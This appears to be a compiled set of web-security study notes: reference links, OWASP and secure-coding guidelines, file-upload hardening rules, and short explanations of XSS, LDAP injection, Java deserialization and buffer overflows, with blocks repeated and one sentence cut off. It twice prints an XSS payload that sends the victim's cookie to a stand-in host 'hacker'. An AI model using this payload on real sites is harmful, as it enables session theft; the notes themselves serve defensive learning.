HPE Security Fortify Static Code Analyzer (SCA)
http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://github.com/thoughtbot/guides/tree/master/security
OWASP Top Ten 2013 Project
https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents
https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/
IEEE Top Design Flaws
http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html
https://dzone.com/articles/java-serialization-vulnerability-threatens-million
http://www.veracode.com/security/xss
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
sitting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.
LDAP Injection
http://searchsoftwarequality.techtarget.com/definition/LDAP-injection
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
https://docs.kentico.com/display/K7SG/Lightweight+Directory+Access+Protocol+(LDAP)+injection
http://docs.spring.io/spring-ldap/docs/current/reference/
In addition to simplifying building of complex search parameters, the
http://segmentfault.com/a/1190000004030596
Github Hacking
http://tech.163.com/16/0122/06/BDTP3FUP000915BD.html
http://www8.hp.com/us/en/software-solutions/static-code-analysis-sast/
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://github.com/thoughtbot/guides/tree/master/security
- Use HSTS headers to enforce HTTPS traffic.
- Use secure cookies.
- Avoid protocol-relative URLs.
- Don't store passwords in plain text.
- Don't hash passwords using a reversible cipher.
- Don't hash passwords using a broken cipher, such as MD5 or SHA1.
- Don't accept passwords or session tokens over HTTP.
- PGP and GnuPG
- Use a PGP signature in an email if you want somebody to trust that you wrote it.
- Use PGP to check email signatures if you want to know who wrote it.
- Use PGP to encrypt emails if you want to be sure nobody but the recipient is reading it.
- Use ultimate trust for your own keys.
- Use full trust for keys you have verified in person or via a secure video chat.
- Don't share your private key with anyone, including services like Keybase.
- Keep at least one backup of your private key and revocation certificate in a secure location, such as a thumb drive.
- Use a tool like pwgen or 1password to generate random passwords.
- Use a tool like GnuPG to encrypt passwords if you need to share them with somebody.
- Never accept a filename and its extension directly without having a white-list filter.
- It is necessary to have a list of only permitted extensions on the web application. And, file extension can be selected from the list. For instance, it can be a “select case” syntax (in case of having VBScript) to choose the file extension in regard to the real file extension.
- All the control characters and Unicode ones should be removed from the filenames and their extensions without any exception. Also, the special characters such as “;”, “:”, “>”, “<”, “/” ,”\”, additional “.”, “*”, “%”, “$”, and so on should be discarded as well. If it is applicable and there is no need to have Unicode characters, it is highly recommended to only accept Alpha-Numeric characters and only 1 dot as an input for the file name and the extension; in which the file name and also the extension should not be empty at all (regular expression: [a-zA-Z0-9]{1,200}\.[a-zA-Z0-9]{1,10}).
- Limit the filename length. For instance, the maximum length of the name of a file plus its extension should be less than 255 characters (without any directory) in an NTFS partition.
- It is recommended to use an algorithm to determine the filenames. For instance, a filename can be a MD5 hash of the name of file plus the date of the day.
- Uploaded directory should not have any “execute” permission.
- Limit the file size to a maximum value in order to prevent denial of service attacks (on file space or other web application’s functions such as the image resizer).
- Restrict small size files as they can lead to denial of service attacks. So, the minimum size of files should be considered.
- Use Cross Site Request Forgery protection methods.
- Prevent from overwriting a file in case of having the same hash for both.
- Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension.
- Try to use POST method instead of PUT (or GET!)
- Log users’ activities. However, the logging mechanism should be secured against log forgery and code injection itself.
- In case of having compressed file extract functions, contents of the compressed file should be checked one by one as a new file.
OWASP Top Ten 2013 Project
https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents
https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/
IEEE Top Design Flaws
http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html
https://dzone.com/articles/java-serialization-vulnerability-threatens-million
The problem is that there’s no way to know what you’re deserializing before you’ve decoded it. So an attacker can serialize a bunch of malicious objects and send them to your application. Once you call readObject(), it’s too late. In some ways it’s like an XXE problem, where an attacker can use a malicious DOCTYPE to generate attacks during XML parsing. But in this case, there’s no easy way to turn off DOCTYPE processing.
XSShttp://www.veracode.com/security/xss
For example, the HTML snippet:
<title>Example document: %(title)</title>
is intended to illustrate a template snippet that, if the variable title has value Cross-Site Scripting, results in the following HTML to be emitted to the browser:
<title>Example document: XSS Doc</title>
A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this:
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
sitting on the other end, at the web server, you will be receiving hits where after a double space is the user's cookie. If an administrator clicks the link, an attacker could steal the session ID and hijack the session.
LDAP Injection
http://searchsoftwarequality.techtarget.com/definition/LDAP-injection
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
https://docs.kentico.com/display/K7SG/Lightweight+Directory+Access+Protocol+(LDAP)+injection
http://docs.spring.io/spring-ldap/docs/current/reference/
In addition to simplifying building of complex search parameters, the
LdapQueryBuilder and its associated classes also provide proper escaping of any unsafe characters in search filters. This prevents "ldap injection", where a user might use such characters to inject unwanted operations into your LDAP operations.http://segmentfault.com/a/1190000004030596
缓冲区溢出
例如:把10个字节的数据存入到只分配了8个字节的空间缓冲区
原理:
简单地说,缓冲区溢出就是向一个有限空间的缓冲区拷贝了过长的字符串,覆盖相邻的存储单元,这将会引起程序运行失败。
因为变量保存在堆栈当中,当发生缓冲区溢出的时候,存储在堆栈中的函数返回地址也会被覆盖,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。
一个程序在内存中通常分为程序段,数据段和堆栈段3部分。动态数据则通过堆栈来存放。
当程序中发生函数调用时,计算机做如下操作:
- 首先把参数压入堆栈;
- 然后保存指令寄存器(IP)中的内容作为返回地址(RET);
- 第三个放入堆栈的是基址寄存器(BP):然后把当前的栈指针(SP)拷贝到BP,作为新的基地址;
- 最后为本地变量留出一定空间,把SP减去适当的数值。
BP RET被多余的str覆盖,而覆盖之处恰好就是想要执行程序的入口!
利用空指针加快猜中的可能性
Github Hacking
http://tech.163.com/16/0122/06/BDTP3FUP000915BD.html
history.pushstate()是HTML5引入的API,pushState将指定的URL添加到浏览器历史里,存储当前历史记录点。 当 i<100000 的时候会循环的将 total记录到浏览器历史里面,重复多了,浏览器就承受不住了,自然就崩了。
